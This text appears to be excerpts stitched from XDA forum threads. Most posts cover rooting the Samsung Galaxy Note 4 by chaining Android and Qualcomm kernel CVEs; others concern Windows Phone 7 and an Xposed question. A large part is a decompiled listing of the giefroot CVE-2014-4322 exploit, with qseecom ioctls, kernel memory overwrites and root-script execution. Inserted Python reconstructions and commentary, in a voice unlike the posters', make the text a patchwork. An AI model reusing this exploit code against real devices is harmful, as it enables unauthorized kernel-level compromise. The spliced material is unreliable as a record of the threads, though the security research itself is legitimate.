I did some testing with certificates myself yesterday. Up until Zune totally went berserk on it. I don't know what happened, but after removing my own cooked certs it all seems normal again. Zune started using 100% cpu on verifying certs and dropping my connection all the time. Help! So I haven't made much progress. I will try again later. Hope it will go better. And I will try to resign an existing executable, as Flow WP7 suggested.
According to the policy on my Omnia (webserver dumped) there seem to exist two types of HDD, one ROM hard-coded and one that points to the internal SD card. It seems that all exes and dlls on the SD are not "protected" and therefore can be hijacked.
Seems like ARMv4 will be enough, but to be on the safe side I compile with both, to have more chance of getting it to work.
Zune, hmm, did not seem to like you, maybe Microsoft DDoS'ed you lol
"Sent from my fingers on my phone", don't expect way too long text
XxXPachaXxX said:
Excuse my ignorance...I'm a noob...This hack may also work on LG devices?
At the moment fiinix and I are both working on Samsungs and we use a couple of Samsung-specific exploits to get deeper in the system and get a better understanding of the system. The ultimate goal is to find exploits that will work for all devices. But we're not at that stage yet. Hacking is research, a lot of trying and being lucky sometimes. Just bear with us.
Ciao,
Heathcliff74
Welcome! First I have to ask that everyone please follow the rules when posting in here. The last thread was shut down due to people getting off topic, so let's stay on track here; if you have a question that you'd like to ask and are unsure if it belongs here then simply PM me and I'll help. In order to get things going I've added a simple FAQ below for people who may not be up to speed.
Q: What's needed to root the N910A/N910V?
A: A kernel exploit and an Android OS exploit.
Q: What's the current status?
A: We have a kernel exploit that will work for us and the method to implement it. Our next goal is to apply an Android exploit which will grant us System UID in order to apply our kernel exploit and write root.
Q: What exploit are we using for the kernel side?
A: The exploit will be the work of @zxz0O0 and is based off of CVE-2014-4322. This is confirmed NOT patched by Samsung.
Q: What exploit are we using for Android side?
A: Current target is CVE-2015-1474. We've explored a previous exploit which has proven to work for the Sony Z3 (CVE-2014-7911), but unfortunately Samsung fixed this prior to releasing our devices.
Current Focus - Creating an APK that will exploit CVE-2015-1474 to elevate us to System UID. This is where we are at this current time. We will need a crafty Dev to come up with such APK. I am a novice when it comes to scripting and exploiting but in my free time I've been soaking up as much information as I possibly can to help in the future.
Working on PoC here:
https://github.com/p1gl3t/CVE-2015-1474_poc
Other Threads working on 2015-1474
http://forum.xda-developers.com/kin...luating-cve-2015-1474-to-escalate-to-t3045163
android-DEP said:
@ZPaul2Fresh8 confirmed that CVE-2014-4322 (qseecom) is fixed in N910AUCU1BNK3 but it might not be in N910AUCU1ANIE.
To clarify, CVE-2014-4322 is NOT patched in ANY baseband version on our devices. CVE-2014-7911 is the patched one.
munjeni said:
It's not obfuscated if you think about the file called "main"! It is a 7z archive but with the first 2 bytes "7z" or hex "377A" removed, just simply open the "main" file with a hex editor and append the 2 bytes 37 7A to the start of the file and save it! It is a password protected 7z archive and you must research for the password in assembly if you think to open it with 7z. I still have no idea what the purpose of this "main" file is (malware?) when there is another "main" file (tar.gz) which is extracted when you execute file "a", but I know that's two different "main" files!
From @idler1984 , here's the explanation of the 'a' and 'main' files. HERE.
jorgasm209 said:
Not sure how to prove something that isn't there... hard to prove a negative. APK is claiming not vulnerable even with the apparent absence of checkAndGetTcObjectClass in the firmware. Someone much smarter than me can attempt to find out why. My bet is on @android-DEP ... see post above regarding ServiceExploitActivity.java.
It's been confirmed by me that exploit CVE-2014-7911 has been patched in the latest OTA (NK3 on AT&T) and I believe @zxz0O0 confirmed it on the earlier baseband too. If you're in doubt and you're running the earlier build, just go to system/framework/core.odex and you'll find the function is located there...
Now if you're just skimming through here let me catch everyone up to speed here;
At this point, in order to achieve root for our devices we will need a combination of exploits. There are a ton of CVEs being thrown around and I can see why people are getting confused, so I'll try to make it easier to understand. I'll break it down by CVE #.
CVE-2014-7911 - Patched so it doesn't matter. Android OS exploit to gain System UID. Not Root
CVE-2014-8609 - Android OS exploit. Possibly our next venture for gaining System UID, I've been told otherwise. Another vulnerability exists that may be easier. CVE-2015-1474
CVE-2014-4322 - Kernel exploit. Un-patched. Used to get Root while in System status.
So we need an exploit to get us System status and from there we pretty much have CVE-2014-4322 exploit to get Root from there.
Now, you may have read about Root solutions such as geifroot & 2014-79xx but forget about them because they are all based on Team Keen's exploit of CVE-2014-7911 which we confirmed has been backported and patched from day 1 on our devices. So in order to proceed we need a new exploit to get System status first... that vulnerability may be 2015-1474....
ZPaul2Fresh8, thanks for this write up. Finally someone who has understood the situation. I'm not really experienced in Java but I believe CVE-2014-8609 will not be useful. This exploit is for broadcasting actions to apps (e.g. dialing), not executing shell commands or binaries.
zxz0O0 said:
ZPaul2Fresh8, thanks for this write up. Finally someone who has understood the situation. I'm not really experienced in Java but I believe CVE-2014-8609 will not be useful. This exploit is for broadcasting actions to apps (e.g. dialing), not executing shell commands or binaries.
I understand, but what are the possible Broadcasts at our disposal? Whatever broadcast we send will be of System UID so maybe we can find something if we look hard enough?
I have Liang Chen (Team Keen (http://en.wikipedia.org/wiki/Pwn2Own#Contest_2014)) looking into CVE-2014-8609 to see if we can achieve System UID.
munjeni said:
Guys, the CVE-2014-4322 root exploit from retme7 is not working, it needs a lot of modifications, I have been working on this for 3 days and I am at 90 percent of luck, I am now stuck with this -> http://forum.xda-developers.com/showpost.php?p=58460530&postcount=1171
If you have an idea for how I can change app_id then I will get it working and will share the source with you!
This is decompiled source from a guy who has it working and doesn't want to share it:
Code:
void sub_89F4(void) {
;
}
int __fastcall sub_8A78(signed int a1, int a2)
{
/* register-allocated locals (Hex-Rays register annotations were mangled by the page extraction and are dropped) */
signed int v2;
FILE *v3;
void *v4;
signed int v5;
FILE *v6;
int v7;
char v8;
const char *v9;
_UNKNOWN *v10;
_UNKNOWN *v11;
char **v12;
const char *v13;
int result;
int ion_fd;
int v16;
int v17;
int *v18;
char *v19;
int v20;
int qseecom_fd;
int v22;
int v23;
int v24;
int *v25;
char *v26;
int *v27;
int v28;
int v29;
int v30;
int v31;
int v32;
int v33;
int v34;
int v35;
int *v36;
int v37;
int v38;
int v39;
int v40;
int *v41;
int v42;
int v43;
void *v44;
int v45;
int v46;
unsigned int v47;
int v48;
int v49;
int v50;
int *v51;
int ptmx_fd;
int v53;
int v54;
int v55;
int v56;
int *v57;
char *v58;
int v59; // [sp+Ch] [bp-1F4h]@1
int memfile_fd; // [sp+Ch] [bp-1F4h]@26
void *ion_void; // [sp+14h] [bp-1ECh]@26
int v62; // [sp+18h] [bp-1E8h]@24
int v63; // [sp+1Ch] [bp-1E4h]@38
int v64; // [sp+20h] [bp-1E0h]@38
int v65; // [sp+24h] [bp-1DCh]@38
int v66; // [sp+28h] [bp-1D8h]@38
int v67; // [sp+2Ch] [bp-1D4h]@22
int v68; // [sp+30h] [bp-1D0h]@22
int v69; // [sp+34h] [bp-1CCh]@22
int v70; // [sp+38h] [bp-1C8h]@22
int v71; // [sp+3Ch] [bp-1C4h]@24
unsigned int v72; // [sp+40h] [bp-1C0h]@41
int v73; // [sp+44h] [bp-1BCh]@41
int v74; // [sp+48h] [bp-1B8h]@41
int v75; // [sp+4Ch] [bp-1B4h]@41
int v76; // [sp+50h] [bp-1B0h]@41
unsigned int v77; // [sp+54h] [bp-1ACh]@41
int v78; // [sp+58h] [bp-1A8h]@41
int v79; // [sp+5Ch] [bp-1A4h]@41
int v80; // [sp+60h] [bp-1A0h]@41
int v81; // [sp+64h] [bp-19Ch]@41
int v82; // [sp+68h] [bp-198h]@41
int v83; // [sp+6Ch] [bp-194h]@41
char v84; // [sp+70h] [bp-190h]@4
char v85[4]; // [sp+90h] [bp-170h]@29
int v86; // [sp+94h] [bp-16Ch]@29
int v87; // [sp+98h] [bp-168h]@29
char v88; // [sp+9Ch] [bp-164h]@29
int v89; // [sp+A0h] [bp-160h]@30
int v90; // [sp+A4h] [bp-15Ch]@30
int v91; // [sp+A8h] [bp-158h]@30
int v92; // [sp+ACh] [bp-154h]@30
int v93; // [sp+B0h] [bp-150h]@30
int v94; // [sp+B4h] [bp-14Ch]@30
int v95; // [sp+B8h] [bp-148h]@30
int v96; // [sp+BCh] [bp-144h]@30
int v97; // [sp+C0h] [bp-140h]@30
int v98; // [sp+C4h] [bp-13Ch]@30
int v99; // [sp+C8h] [bp-138h]@30
int v100; // [sp+CCh] [bp-134h]@30
char v101; // [sp+D4h] [bp-12Ch]@1
int v102; // [sp+1D4h] [bp-2Ch]@1
char v103; // [sp+1D8h] [bp-28h]@4
v2 = a1;
v102 = _stack_chk_guard;
v59 = a2;
puts("giefroot (c) zxz0O0");
v3 = fopen("/proc/version", "r");
fread(&v101, 0x100u, 1u, v3);
fclose(v3);
v4 = malloc(0x100u);
v5 = 30;
v6 = fopen("/system/build.prop", "r");
do
{
while ( 1 )
{
fgets((char *)v4, 256, v6);
v7 = strncmp((const char *)v4, "ro.product.device=", 0x12u);
v8 = v7;
if ( !v7 )
break;
--v5;
if ( !v5 )
goto LABEL_5;
}
strcpy(&v84, (const char *)v4 + 18);
--v5;
*(&v103 + strlen(&v84) - 361) = v8;
}
while ( v5 );
LABEL_5:
fclose(v6);
free(v4);
v9 = supported_kernel[0];
if ( supported_kernel[0] )
{
v10 = &unk_D014;
v11 = &unk_D0A4;
v12 = (char **)unk_D0A4;
do
{
if ( !strcmp(v9, &v101) && (!v12 || !strcmp((const char *)*((int *)v10 - 4), &v84)) )
{
v12 = &supported_kernel[5 * v5];
unk_D0A4 = &supported_kernel[5 * v5];
}
v13 = *(const char **)v10;
v10 = (char *)v10 + 20;
v9 = v13;
++v5;
}
while ( v13 );
}
else
{
v11 = &unk_D0A4;
v12 = (char **)unk_D0A4;
}
if ( v12 )
{
v12 = (char **)1;
}
else
{
puts("Error: Kernel not supported");
printf("Device: %s, Kernel: %s\n", &v84, &v101);
*(int *)v11 = supported_kernel;
}
if ( v2 > 1 && !strcmp(*(const char **)(v59 + 4), "-s") )
{
result = (unsigned int)v12 ^ 1;
goto error;
}
ion_fd = open("/dev/ion", 0);
if ( ion_fd < 0 )
puts("Error opening ion device");
v67 = 256;
v68 = 4;
v69 = 134217728;
v70 = 1;
sub_89F4();
v16 = ioctl(ion_fd, ION_IOC_ALLOC, &v67);
if ( v16 )
{
v25 = (int *)((int (*)(void))_errno)();
v26 = strerror(*v25);
printf("Error ioctl: %d / %s\n", v16, v26);
}
else
{
sub_89F4();
}
v62 = v71;
v17 = ioctl(ion_fd, ION_IOC_SHARE, &v62);
if ( v17 )
{
v18 = (int *)((int (*)(void))_errno)();
v19 = strerror(*v18);
printf("Error ioctl: %d / %s\n", v17, v19);
}
else
{
sub_89F4();
}
sub_89F4();
ion_void = (void *)mmap(0, 256, 7, 1);
memset(ion_void, 255, 0x100u);
memfile_fd = open("/data/local/tmp/memfile", 2);
if ( memfile_fd < 0 )
sub_89F4();
v20 = mmap(0, 2113929216, 7, 1);
if ( v20 == -1 )
puts("mmap shared_buf failed");
qseecom_fd = open("/dev/qseecom", 0);
if ( qseecom_fd < 0 )
{
puts("Error opening qseecom");
getting_root:
close(memfile_fd);
close(ion_fd);
close(qseecom_fd);
puts("getting root...");
ptmx_fd = open("/dev/ptmx", 0);
fsync(ptmx_fd, v53);
v54 = close(ptmx_fd);
v55 = getuid(v54);
v56 = printf("getuid: %d\n", v55);
if ( getuid(v56) )
{
puts("Error getting root");
result = 1;
}
else
{
system("/data/local/tmp/systemrw.sh");
system("/data/local/tmp/installsupersu.sh");
result = 0;
}
goto error;
}
sub_89F4();
*(int *)v85 = 1769437812;
v86 = 1769366884;
v87 = 25966;
memset(&v88, 0, 0x14u);
while ( 1 )
{
while ( 1 )
{
v93 = *(int *)v85;
v94 = v86;
v95 = v87;
v96 = *(int *)&v88;
v97 = v89;
v98 = v90;
v99 = v91;
v100 = v92;
v22 = ioctl(qseecom_fd, QSEECOM_IOCTL_APP_LOADED_QUERY_REQ, &v93);
if ( v22 )
{
v27 = (int *)_errno(v22, v23, v24);
strerror(*v27);
sub_89F4();
goto obtain_qseecom_mem;
}
sub_89F4();
puts("query failed. trying another app...");
if ( strcmp(v85, "tzwidevine") )
break;
strcpy(v85, "keymaster");
}
if ( strcmp(v85, "keymaster") )
break;
strcpy(v85, "tzsuntory");
}
if ( !strcmp(v85, "tzsuntory") )
{
puts("Error querying app");
goto getting_root;
}
obtain_qseecom_mem:
v64 = v63;
v65 = v20;
v66 = 2113929216;
v28 = ioctl(qseecom_fd, QSEECOM_IOCTL_SET_MEM_PARAM_REQ, &v64);
v31 = v28;
if ( v28 )
{
v57 = (int *)_errno(v28, v29, v30);
v58 = strerror(*v57);
printf("Error ioctl QSEECOM_IOCTL_SET_MEM_PARAM_REQ: %d / %s\n", v31, v58);
}
else
{
sub_89F4();
}
munmap(v20, 2113929216);
v32 = mmap(v20, 4096, 7, 50);
if ( v32 == -1 )
puts("Error allocating shared buf again");
memset((void *)v32, 255, 0x1000u);
v77 = 0;
v79 = 0;
v78 = 0;
v81 = 0;
v80 = 0;
v83 = 0;
v82 = 0;
v73 = 2113921024;
v74 = v32 + 80;
v75 = 4096;
v76 = v63;
v72 = v32;
puts("getting ptr");
v33 = ioctl(qseecom_fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &v72);
if ( v33 )
{
v36 = (int *)_errno(v33, v34, v35);
strerror(*v36);
sub_89F4();
}
else
{
sub_89F4();
}
munmap(v32, 4096);
sub_89F4();
v37 = mmap(v20, 524288, 7, 49);
if ( v37 != -1 )
{
sub_89F4();
memset((void *)v37, 255, 0x80000u);
v72 = v32 + ((unsigned int)(v37 + 979369984) >> 1);
v77 = (unsigned int)(v37 + 979369984) >> 1;
puts("getting offset");
v38 = ioctl(qseecom_fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &v72);
if ( v38 )
{
v41 = (int *)_errno(v38, v39, v40);
strerror(*v41);
sub_89F4();
}
else
{
sub_89F4();
}
v42 = sub_8A00(v37, 524288);
munmap(v37, 524288);
v43 = mmap(*(int *)ion_void, 1024, 7, 49);
if ( v43 == -1 )
{
puts("Error: Could not allocate memory for exploit code");
}
else
{
v44 = (void *)v43;
sub_89F4();
memcpy(v44, sub_8994, 0x400u);
munmap(ion_void, 4096);
v45 = (int)((char *)v44 + 64);
do
{
while ( 1 )
{
v46 = *(int *)v44;
v44 = (char *)v44 + 4;
if ( v46 == -1091584273 )
break;
if ( v44 == (void *)v45 )
goto exploit_qseecom;
}
*((int *)v44 - 1) = sub_89A4;
}
while ( v44 != (void *)v45 );
exploit_qseecom:
v47 = v32 + ((unsigned int)(v37 + *(int *)(*(int *)v11 + 8) + 979370040 - v42) >> 1);
v77 = (unsigned int)(v37 + *(int *)(*(int *)v11 + 8) + 979370040 - v42) >> 1;
v72 = v47;
puts("exploiting");
v48 = ioctl(qseecom_fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &v72);
if ( v48 )
{
v51 = (int *)_errno(v48, v49, v50);
strerror(*v51);
sub_89F4();
}
else
{
sub_89F4();
}
}
goto getting_root;
}
puts("Error allocating testmem");
result = 1;
error:
if ( v102 != _stack_chk_guard )
_stack_chk_fail(result);
return result;
}
I tried to construct it, but sorry, I am not skilled in reverse engineering. If you understand it then try to construct the right function from that and share it here!
Making CVE-2014-4322 a universal one would be quite challenging since it provides write-anywhere without read. It is almost impossible to avoid hard coded offsets. It would be great if there is another read and write anywhere flaw which requires system priv.
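The decompiled listing above spends its first hundred lines doing nothing exploit-specific: it reads /proc/version and the ro.product.device line of /system/build.prop, then looks the pair up in a supported-kernel table so that the hard-coded offsets zxz0O0 mentions are selected per kernel build. The following is an added example, not the giefroot binary's own code and not from any post in this thread; it reconstructs only that support-check logic. The kernel banners, device name and offset values in the table are constructed placeholders, not offsets for any real device, and the exact-match-on-banner / optional-device semantics are my reading of the `strcmp` loop in the decompile.

```python
"""Kernel/device lookup of the kind the decompiled giefroot main() performs.

Added example: reconstructs only the part of sub_8A78 that reads
/proc/version and ro.product.device and selects a supported-kernel table
entry.  The ION/QSEECOM path is deliberately not reproduced.  All table
contents below are constructed placeholders.
"""
from __future__ import annotations

from dataclasses import dataclass


@dataclass
class SupportedKernel:
    version: str              # exact /proc/version banner (the binary strcmp()s it)
    device: str | None        # ro.product.device, or None to accept any device
    offsets: dict[str, int]   # hypothetical per-kernel constants (placeholders)


# Constructed table; the real binary keeps a 5-word-per-entry array.
SUPPORTED_KERNELS: tuple[SupportedKernel, ...] = (
    SupportedKernel(
        "Linux version 3.4.0-example1 (build@host) (gcc 4.8) #1 SMP PREEMPT",
        "exampledevice",
        {"target": 0x0, "payload": 0x0},
    ),
    SupportedKernel(
        "Linux version 3.4.0-example2 (build@host) (gcc 4.8) #1 SMP PREEMPT",
        None,
        {"target": 0x0, "payload": 0x0},
    ),
)


def read_kernel_version(proc_version_text: str) -> str:
    """First line of /proc/version, newline stripped (the binary fread()s
    0x100 raw bytes; stripping here keeps table banners readable)."""
    return proc_version_text.split("\n", 1)[0].strip()


def read_product_device(build_prop_text: str, max_lines: int = 30) -> str | None:
    """Scan at most `max_lines` lines of build.prop for ro.product.device=,
    the same bounded loop the decompiled code runs (v5 counts down from 30)."""
    for lineno, line in enumerate(build_prop_text.splitlines()):
        if lineno >= max_lines:
            break
        if line.startswith("ro.product.device="):
            return line[len("ro.product.device="):].strip()
    return None


def find_supported(kernel: str, device: str | None,
                   table: tuple[SupportedKernel, ...] = SUPPORTED_KERNELS
                   ) -> SupportedKernel | None:
    """First entry whose banner matches exactly and whose device either
    matches or is a wildcard; None corresponds to 'Error: Kernel not supported'."""
    for entry in table:
        if entry.version != kernel:
            continue
        if entry.device is None or entry.device == device:
            return entry
    return None


def check_support(proc_version_text: str, build_prop_text: str) -> str:
    """Return the message the binary prints in its support-check ('-s') mode."""
    kernel = read_kernel_version(proc_version_text)
    device = read_product_device(build_prop_text)
    entry = find_supported(kernel, device)
    if entry is None:
        return f"Error: Kernel not supported\nDevice: {device}, Kernel: {kernel}"
    return f"supported: {entry.device or 'any device'} / {entry.version}"


if __name__ == "__main__":
    # Constructed inputs standing in for /proc/version and /system/build.prop.
    sample_version = "Linux version 3.4.0-example1 (build@host) (gcc 4.8) #1 SMP PREEMPT\n"
    sample_build_prop = "ro.build.id=EXAMPLE\nro.product.device=exampledevice\n"
    print(check_support(sample_version, sample_build_prop))
```

On a real device you would feed `check_support` the contents of `adb shell cat /proc/version` and `adb shell cat /system/build.prop`; the point of the exact banner match is the one zxz0O0 makes above: with write-only primitives the offsets must be pinned to one kernel build, so anything but a byte-exact banner match has to fail closed.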
ZPaul2Fresh8 said:
I understand, but what are the possible Broadcasts at our disposal? Whatever broadcast we send will be of System UID so maybe we can find something if we look hard enough?
I have Liang Chen (Team Keen (http://en.wikipedia.org/wiki/Pwn2Own#Contest_2014)) looking into CVE-2014-8609 to see if we can achieve System UID.
Okay I decided to try to invoke the android terminal intent to open a new terminal window as a system user. It doesn't work for me but other people on preOTA may be able to get it to work. I disabled the factory reset crap so don't worry about accidentally factory resetting your device (like I did to my tablet before I disabled them). You will need to install the android terminal emulator app from the play store prior to opening this app and clicking the button. If you get a terminal window open, type whoami and post a screenshot please. If not, a simple post saying it doesn't work is fine.
Sent from my SAMSUNG-SM-N910A using Tapatalk
This one is looking good https://android.googlesource.com/pl...5d3e74ecc2b973941d8adbe40c6b23094b5abb7^!/#F0
You can decompile settings.apk and search in src/com/android/settings/accounts/AddAccountSettings.smali to see if it is patched or not.
Hey I know it's already been stated but I wanted to confirm for myself. Confirmed... The string "checkAndGetTcObjectClass" exists in system.img.ext4 from NI1 that I pulled off of sammobile.com http://www.sammobile.com/firmwares/download/38838/N910VVRU1ANI1_N910VVZW1ANI1_VZW.zip/. Screenshot below.
Hi, I have implemented the terminal emulator internally into CVE-2014-8609.apk but for some unknown reason it fails to start when I press the "open terminal" button. I have spent 2 hours on this and I am too lazy to debug more, sorry; try to decompile my apk and fix it! Interesting thing: I can start the internal terminal emulator with the command "am start -n com.example.android.samplesync/jackpal.androidterm.Term", but on clicking the button it does not want to start.
munjeni said:
I don't know, I am still receiving sms, only unable to get the terminal emulator on button click
I don't understand it. I'm passing the intent the same way the sms intent and format interested t is passed back to the pending intent. It's just not working. I'm trying to make a service to hand it off to within the app so that once its intent is hit I can keep it alive in the background service, and then pull it back into the foreground to use it. In theory this should work even though the originating pending intent is killed shortly after the button press.
Sent from my SAMSUNG-SM-N910A using Tapatalk
stvn1337 said:
I don't understand it. I'm passing the intent the same way the sms intent and format interested t is passed back to the pending intent. It's just not working. I'm trying to make a service to hand it off to within the app so that once its intent is hit I can keep it alive in the background service, and then pull it back into the foreground to use it. In theory this should work even though the originating pending intent is killed shortly after the button press.
Sent from my SAMSUNG-SM-N910A using Tapatalk
Yes, strange: when I click on "open terminal" it opens settings, and further clicks do nothing until I kill the app and launch it again. Strange. Maybe we need to look into the terminal emulator for this? I have no time now, but can you try to open another app?
It opens com.google.android.c2dm.intent successfully but not the terminal emulator, I don't know why.
munjeni said:
Yes, strange: when I click on "open terminal" it opens settings, and further clicks do nothing until I kill the app and launch it again. Strange. Maybe we need to look into the terminal emulator for this? I have no time now, but can you try to open another app?
It opens com.google.android.c2dm.intent successfully but not the terminal emulator, I don't know why.
You're correct. I wonder if terminal emulator has been patched to prevent the broadAnywhere bug from launching it? If so then we need to find another terminal emulator that allows broadAnywhere to launch it with intents. Unless someone has time to search the terminal emulator's source to figure out how it's been patched to prevent it..
Sent from my SAMSUNG-SM-N910A using Tapatalk
Maxninja said:
I did some research and googled the CVE-2014-4322 exploit and I stumbled on a forum for the Sony Xperia for them to achieve root with that exploit - http://forum.xda-developers.com/showthread.php?t=3011598
I don't know if it's useful but I hope it will help somewhere in the process for our phone to be rooted with the same exploit.
Yeah that was covered 50+ pages ago. That's the kernel side of it, we know that will work but first we have to get through the Android side first. That's what 1474 should do for us.
@soupmeister Yes. This is the best place.
windstrings said:
This brings the next question.. An educated guess as to whether this will work with lollipop?
I would be curious about this also, but only after root is out for pre-Lollipop. The description says through 5.0, which sounds to me like 5.0 is vulnerable but who knows if 5.0.1 or 5.0.2 is. Also Samsung, as we've seen recently with the root that works on other phones using those two CVEs not working on our phones, will backport fixes. I don't know how much Samsung is still tweaking their Lollipop update, but since this seems like a small fix, my money would be on it being fixed in the Samsung Lollipop update.
Btw I've been trying to upload the contents of system.img.ext4 from the AT&T and Verizon tar md5 files to Google Drive for easy reference but it keeps timing out and I don't want to post something missing random files. I'll try with a specialized uploader tool later.
Also CVE-2015-1474 was updated on the 17th to say that it's network exploitable(!) and I guess they gave it a 10.0 score, the highest! This seems to be more serious than that last "worst android bug ever" recently used for root in the last year.
I sure hope whatever tool that gives root that comes out also applies a fix for this. I wouldn't want to walk around with it if I could help it.
So after a bunch of useless posts basically asking to confirm this or thanking that..at least we can count on qcom to brighten our day...
https://www.codeaurora.org/projects...le-camera-drivers-cve-2014-4321-cve-2014-4324
Qcom camera FTW
Just a little further reading for some:
http://www.cvedetails.com/cve/CVE-2015-1474/
jcase said:
Would still require 1 or 2 additional vulns to exploit. Not so easy to get camera group in modern Android
Correct me if I am wrong but camera group should actually be rather easy to take advantage of especially in modern Android. In June this last year the play store rolled out an update that groups all applications for security permissions, so in theory, any app in this group can be used to exploit the vulnerability found. Which means all apps that take picture or record audio are on the table as they are all lumped in together with the camera group.
Basic example of what apps like this can do now that they are grouped.
Camera/Microphone: An app that has permission to take pictures and videos (for example, a camera app) can now gain the permission to record audio. The app could listen to you when you use other apps or when your device’s screen is off.
If this is true then someone much smarter than me should have a lot to fool around with.
jasonstackhouse said:
Correct me if I am wrong but camera group should actually be rather easy to take advantage of especially in modern Android. In June this last year the play store rolled out an update that groups all applications for security permissions, so in theory, any app in this group can be used to exploit the vulnerability found. Which means all apps that take picture or record audio are on the table as they are all lumped in together with the camera group.
Basic example of what apps like this can do now that they are grouped.
Camera/Microphone: An app that has permission to take pictures and videos (for example, a camera app) can now gain the permission to record audio. The app could listen to you when you use other apps or when your device’s screen is off.
If this is true then someone much smarter than me should have a lot to fool around with.
Ok I will. These "permission groups" from the play store have nothing to do with this. We are talking about a single android permission (android.permission.CAMERA) and a single linux group ("camera").
In 5.0, and many 4.x devices (I don't think it was all, it might have been all, I just don't care to find my notes; 10hr trip to take son to Dr and back, just got home and freaking tired) the linux group "camera" used in android was severed from the camera permission; declaring this permission does not put your user (app) into the camera group.
Simple test,
adb shell grep -A 10 -B 10 camera /system/etc/permissions/platform.xml
On blackphone (4.4.x), HTC Desire 510 (4.4.x) MotoX 2014 (5.0.x), the above command returned nothing.
On older devices, say 4.2.2, you would get the following as the output:
<permission name="android.permission.CAMERA" >
<group gid="camera" />
</permission>
This means apps that are granted the permission are put into the group "camera".
See:
https://android.googlesource.com/platform/frameworks/base/+/android-4.2.2_r1/data/etc/platform.xml
vs
https://android.googlesource.com/platform/frameworks/base/+/android-4.4.2_r1/data/etc/platform.xml
What does this mean? You can't directly talk to what you need to in order to exploit those camera vulns; you would need to exploit mediaserver, or escalate to system first (which means squat: if you are system you have 100 ways to root that are easier than these camera bugs). Also must not forget about SEAndroid, might put a snag into it as well, but like I've said I just saw these today, and have been home for a whole 10 minutes so far today.
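The grep jcase suggests answers the question by eye; the added example below (not from any post in this thread, and not part of Android's own tooling) answers it mechanically by parsing platform.xml the way the framework does: each `<permission name=...>` element lists `<group gid=...>` children, and an app granted that permission joins those gids. The two embedded documents are constructed samples modelled on the 4.2.2 output jcase quotes and on the Samsung 4.4.x output pasted further down; the script also takes a real file pulled with `adb pull /system/etc/permissions/platform.xml`.

```python
"""Which Linux gids does a framework permission confer on this build?

Added example: parses /system/etc/permissions/platform.xml and reports the
<group gid=...> entries under a <permission name=...> element, which is
the mapping jcase's `grep -A 10 -B 10 camera` test is looking for.
"""
from __future__ import annotations

import sys
import xml.etree.ElementTree as ET

# Constructed sample modelled on the 4.2.2 platform.xml quoted in the thread:
# android.permission.CAMERA still maps to gid "camera".
OLD_PLATFORM_XML = """<permissions>
    <permission name="android.permission.CAMERA" >
        <group gid="camera" />
    </permission>
    <permission name="android.permission.INTERNET" >
        <group gid="inet" />
    </permission>
</permissions>
"""

# Constructed sample modelled on the Samsung 4.4.x output pasted in the thread:
# the AOSP CAMERA permission has no group entry, only Samsung's own
# permissions still map to "camera".
NEW_PLATFORM_XML = """<permissions>
    <permission name="android.permission.INTERNET" >
        <group gid="inet" />
    </permission>
    <permission name="com.sec.android.permission.CAMERA" >
        <group gid="camera" />
    </permission>
    <!-- Group that can use gscaler -->
    <permission name="com.sec.android.permission.USE_CAMERA" >
        <group gid="camera" />
    </permission>
    <assign-permission name="android.permission.READ_LOGS" uid="shell" />
</permissions>
"""


def gid_map(platform_xml: str) -> dict[str, list[str]]:
    """Return {permission name: [gid, ...]} for every <permission> element.

    <assign-permission> elements grant permissions to fixed uids, not gids
    to apps, so they are ignored here on purpose.
    """
    root = ET.fromstring(platform_xml)
    mapping: dict[str, list[str]] = {}
    for perm in root.iter("permission"):
        name = perm.get("name")
        if not name:
            continue
        gids = [g.get("gid") for g in perm.findall("group") if g.get("gid")]
        mapping.setdefault(name, []).extend(gids)
    return mapping


def permission_gids(platform_xml: str, permission: str) -> list[str]:
    """Gids an app joins when granted `permission`; [] means no group mapping."""
    return gid_map(platform_xml).get(permission, [])


def permissions_for_gid(platform_xml: str, gid: str) -> list[str]:
    """Every permission that confers membership of `gid`, in file order."""
    return [name for name, gids in gid_map(platform_xml).items() if gid in gids]


def main(argv: list[str]) -> int:
    if len(argv) != 3:
        print(f"usage: {argv[0]} platform.xml <permission | gid:<group>>")
        return 2
    with open(argv[1], encoding="utf-8") as fh:
        xml_text = fh.read()
    query = argv[2]
    if query.startswith("gid:"):
        hits = permissions_for_gid(xml_text, query[4:])
        print(f"permissions granting gid {query[4:]!r}: {hits or 'none'}")
    else:
        gids = permission_gids(xml_text, query)
        print(f"{query} -> gids {gids or 'none (no group mapping on this build)'}")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python platform_gids.py platform.xml android.permission.CAMERA` on a pulled file; an empty result is jcase's point that holding the permission no longer gets a third-party app into the camera group, while `gid:camera` lists which (vendor or platform-signed) permissions still do.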
Misterxtc said:
If it helps any this is what the adb command returned on the VZW Note4 on NJ5.
View attachment 3172812
Same here, AT&T NIE
C:\Users\rac1\Desktop\ADB>adb shell grep -A 10 -B 10 camera /system/etc/permissions/platform.xml
<permission name="android.permission.SYSTEM_GROUP_INTERNAL" >
<group gid="system" />
</permission>
<permission name="android.permission.INTERNET" >
<group gid="inet" />
</permission>
<permission name="com.sec.android.permission.CAMERA" >
<group gid="camera" />
</permission>
<permission name="android.permission.READ_LOGS" >
<group gid="log" />
</permission>
<permission name="android.permission.READ_EXTERNAL_STORAGE" >
<group gid="sdcard_r" />
</permission>
--
<group gid="graphics" />
</permission>
<!-- Except for SysScope, DO NOT USE this permission. -->
<permission name="com.sec.android.app.sysscope.permission.ACCESS_SYSTEM_INFO_SYSSCOPE_ONLY" >
<group gid="radio" />
</permission>
<!-- Group that can use gscaler -->
<permission name="com.sec.android.permission.USE_CAMERA" >
<group gid="camera" />
</permission>
<!-- ================================================================== -->
<!-- ================================================================== -->
<!-- ================================================================== -->
<!-- The following tags are assigning high-level permissions to specific
user IDs. These are used to allow specific core system users to
perform the given operations with the higher-level framework. For
example, we give a wide variety of permissions to the shell user
OK let's not forget about cve-2015-1474. This is the vulnerability that's going to get us what we want. Let's not get sidetracked about another vulnerability that we may not even need.
I'm trying to read the list of active Xposed modules at "/data/data/de.robv.android.xposed.installer/conf/modules.list"
Currently, I'm using
Code:
String line;
process = new ProcessBuilder("su", "-c", "cat", MODULES_LIST_FILE).start();
BufferedReader in = new BufferedReader(new InputStreamReader(process.getInputStream()));
while ((line = in.readLine()) != null) {
modules.add(line);
}
in.close();
- which does work, I'd just prefer to not require root access.
Where could I possibly hook to give me access to this file?
Thanks!
arilotter said:
I'm trying to read the list of active Xposed modules at "/data/data/de.robv.android.xposed.installer/conf/modules.list"
